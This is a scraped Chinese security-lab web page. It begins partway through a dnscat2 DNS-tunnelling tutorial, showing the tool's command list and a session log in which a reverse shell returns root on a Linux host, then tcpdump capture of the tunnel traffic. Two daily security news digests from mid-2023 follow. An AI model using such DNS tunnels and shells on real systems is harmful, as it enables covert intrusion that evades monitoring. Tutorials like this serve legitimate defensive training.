delay(修改远程会话超时时间) exec(执行远程机上的程序) shell(得到一个反弹shell,此处必须在1::command(kali)中使用) download/upload(两端之间上传下载文件) listen <本地端口> <控制端IP/127.0.0.1>:<端口>(端口转发,此处)(此处必须在1::command(kali)中使用)dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (ubuntu) 1> whoami Error: Unknown command: whoami command (ubuntu) 1> shell Sent request to execute a shell command (ubuntu) 1> New window created: 2 Shell session created! whoami Error: Unknown command: whoami command (ubuntu) 1> session -i 2 New window created: 2 history_size (session) => 1000 Session 2 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a console session! That means that anything you type will be sent as-is to the client, and anything they type will be displayed as-is on the screen! If the client is executing a command and you don't see a prompt, try typing 'pwd' or something! To go back, type ctrl-z. sh (ubuntu) 2> whoami sh (ubuntu) 2> root tcpdump -i dns0 port 53 -w file.pcap 流量包内的数据内容 请求包和回包区别不大,在返回包多了域名的信息的TXT记录加密传输信息,可以看到DNS的查询请求的域名信息前的一串数据,里面就是加密过后的交互数据。 6 其它工具 跟工具关系不大,隧道的话DNS只要ip和域名没标签,其实走的都是udp的协议,所以在安全设备上都是流量数据,其类似的工具有dns2tcp等,但是总体来讲该隧道比较慢不稳定,比较慢且传输不支持大流量传输。
网络安全日报 2023年06月01日
1、研究人员发现利用GoogleAds传播RomCom恶意软件的攻击活动 https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html 一项传播RomCom后门恶意软件的新活动正在冒充知名或虚构软件的网站,诱使用户下载并启动恶意安装程序。自2022年夏季以来一直关注RomCom的趋势科技发现了最新的活动。研究人员报告说,恶意软件背后的威胁行为者通过使用有效载荷加密和混淆来升级其规避,并通过引入新的强大命令来扩展该工具的功能。大多数用于向受害者分发RomCom的网站都涉及远程桌面管理应用程序,这增 2、WordPress插件“Gravity Forms”易受PHP对象注入攻击 https://www.bleepingcomputer.com/news/security/wordpress-plugin-gravity-forms-vulnerable-to-php-object-injection/ 目前有超过930000个网站使用的高级WordPress插件“Gravity Forms”容易受到未经身份验证的PHP对象注入攻击。Gravity Forms是一种自定义表单生成器网站所有者, 用于创建付款、注册、文件上传或访问者站点交互或交易所需的任何其他表单。在其网站上,Gravity Forms声称它被各种大公司使用,包括Airbnb、ESPN、耐克、NASA、 3、微软发现macOS漏洞可让黑客绕过SIP root限制 https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/ Apple最近解决了一个漏洞,该漏洞允许拥有root权限的攻击者绕过系统完整性保护(SIP)以安装“不可删除”的恶意软件并通过规避透明、同意和控制(TCC)安全检查来访问受害者的私人数据。该漏洞(称为Migraine)由一组Microsoft安全研究人员发现并报告给Apple,现在被追踪为CVE-2023-32369。系统完整性保护 4、WordPress强制在500万个站点上安装关键的Jetpack补丁 https://jetpack.com/blog/jetpack-12-1-1-critical-security-update/ 开源WordPress内容管理系统背后的公司Automattic今天开始在数百万网站上强制安装安全补丁,以解决Jetpack WordPress插件中的一个严重漏洞。Jetpack是一个非常受欢迎的插件,它提供免费的安全性、性能和网站管理改进,包括站点备份、暴力攻击保护、安全登录、恶意软件扫描等。 5、安卓、鸿蒙指纹识别曝安全漏洞,可无限次暴力破解 https://thehackernews.com/2023/05/new-bruteprint-attack-lets-attackers.html 该攻击方法被称为BrutePrint,通过利用智能手机指纹认证(SFA)框架中的两个零日漏洞,绕过身份验证。这两个漏洞分别为"匹配失败后取消"(CAMF)和 "匹配后锁定"(MAL)。 6、DogeRAT恶意软件正伪装流行APP针对印度安卓用户 https://thehackernews.com/2023/05/sneaky-dogerat-trojan-poses-as-popular.html 作为复杂恶意软件活动的一部分,一种名为DogeRAT的新型开源远程访问木马 (RAT)针对主要位于印度的 Android 用户。 7、GobRAT RAT恶意软件以日本的Linux路由器为目标 https://securityaffairs.com/146795/malware/gobrat-targets-routers-japan.html JPCERT 协调中心警告称,一种名为 GobRAT 的新型 Golang 远程访问木马 (RAT) 正以日本的 Linux 路由器为目标。 8、Palantir演示军队如何利用“ChatGPT”进行作战 https://www.secrss.com/articles/55156 Palantir正在推出Palantir人工智能平台(AIP),该软件旨在运行GPT-4等大型语言模型和专用网络上的替代方案。在其中一个宣传视频中,Palantir演示了军队如何使用AIP进行作战。 9、专利钓饵公司针对开源项目的攻击猛增了100% https://www.4hou.com/posts/XVwm 近年来,专利钓饵公司(patent troll,又译专利流氓)开始攻击众多开源开发人员和公司,但开源社区正在奋力反击。 10、技嘉系统中的关键固件漏洞影响约700万台设备 https://thehackernews.com/2023/05/critical-firmware-vulnerability-in.html 网络安全研究人员在技嘉系统中发现了“类似后门的行为”,他们说这使得设备的UEFI固件能够删除Windows可执行文件并以不安全的格式检索更新。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年05月31日
1、黑客论坛RaidForums近50万成员数据被泄露 https://www.bleepingcomputer.com/news/security/new-hacking-forum-leaks-data-of-478-000-raidforums-members/ RaidForums黑客论坛的数据库已在线泄露,使威胁行为者和安全研究人员能够深入了解经常光顾该论坛的人。RaidForums是一个非常流行且臭名昭著的黑客和数据泄露论坛,以托管、泄露和出售从被入侵组织窃取的数据而闻名。 2、Salt Security发现Expo Framework中的关键安全漏洞 https://salt.security/blog/a-new-oauth-vulnerability-that-may-impact-hundreds-of-online-services Salt Security的安全研究人员发现,用于数百线上服务的知名开发框架Expo出现可劫持账号的重大漏洞。这些漏洞是在Expo使用的开放授权(OAuth)社交登录功能的实施中发现的,它有可能影响任何通过Facebook、Google、Apple和Twitter帐户使用Expo框架登录在线服务的用户。 3、基于Arbitrum的DeFi项目Jimbos Protocol遭遇闪电贷攻击 https://www.bleepingcomputer.com/news/security/flash-loan-attack-on-jimbos-protocol-steals-over-75-million/ 于Arbitrum的DeFi项目Jimbos Protocol遭受闪电贷攻击,导致超过4000个ETH代币丢失,目前价值超过7500000美元。该公司昨天在Twitter上披露了此次攻击事件,称已通知执法部门,并正在与安全专业人员合作进行补救。攻击发生在该平台启动其V2协议仅三天后,当时许多人刚刚投资其“jimbo”代币,犯罪者设法窃取了4090个ETH代币。jimbo代币具有由 4、新型浏览器文件压缩包可滥用ZIP 域名传播恶意软件 https://www.bleepingcomputer.com/news/security/clever-file-archiver-in-the-browser-phishing-trick-uses-zip-domains/ 一种新型"浏览器文件压缩包 "钓鱼工具被试验出可滥用ZIP域名,在浏览器中显示虚假的WinRAR或Windows文件资源管理器窗口,以诱导用户启动恶意文件。 5、俄军嫂邮箱遭乌破解:GRU下属军事单位26165负责人遭曝光 https://www.secrss.com/articles/55106 通过入侵并控制军人家属--军嫂的电子邮箱,进而对关键军方人物进行信息挖掘并曝光,这是乌克兰黑客组织和InformNapalm情报社区的惯用手段。 6、MCNA 泄露了 890 万用户的敏感信息 https://www.freebuf.com/news/367947.html Bleeping Computer 网站披露,北美 MCNA 牙科公司在其网站上发布一份数据泄露告示,通知近 900 万患者个人数据泄露了。(MCNA 牙科是美国最大的牙科护理和口腔健康保险提供商之一。) 7、含SpinOk恶意模块的应用在GooglePlay被安装了4.21亿次 https://www.bleepingcomputer.com/news/security/android-apps-with-spyware-installed-421-million-times-from-google-play/ 在多个应用程序中发现了一种新的Android恶意软件,作为广告SDK分发,其中许多以前在Google Play上,下载量超过4亿次。Dr. Web的安全研究人员发现了间谍软件模块,并将其跟踪为“SpinOk”,警告它可以窃取存储在用户设备上的私人数据并将其发送到远程服务器。 8、PrinterLogic Enterprise 软件中被发现多个漏洞 https://www.securityweek.com/many-vulnerabilities-found-in-printerlogic-enterprise-software/ 在PrinterLogic的企业管理打印机解决方案中发现的漏洞可能会使组织面临身份验证绕过,SQL注入,跨站点脚本(XSS)和其他类型的攻击。 9、研究人员报告了Sonos One扬声器中的关键安全漏洞 https://thehackernews.com/2023/05/hackers-win-105000-for-reporting.html Sonos One无线扬声器中发现的多个安全漏洞可能被潜在地利用来实现信息泄露和远程代码执行,ZDI在上周发布的一份报告中表示。 10、信安标委发布《网络数据安全风险评估实施指引》 https://www.freebuf.com/news/368020.html 《评估指引》适用于指导数据处理者、第三方机构开展风险评估,也可为有关主管监管部门组织开展数据安全检查评估提供参考。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页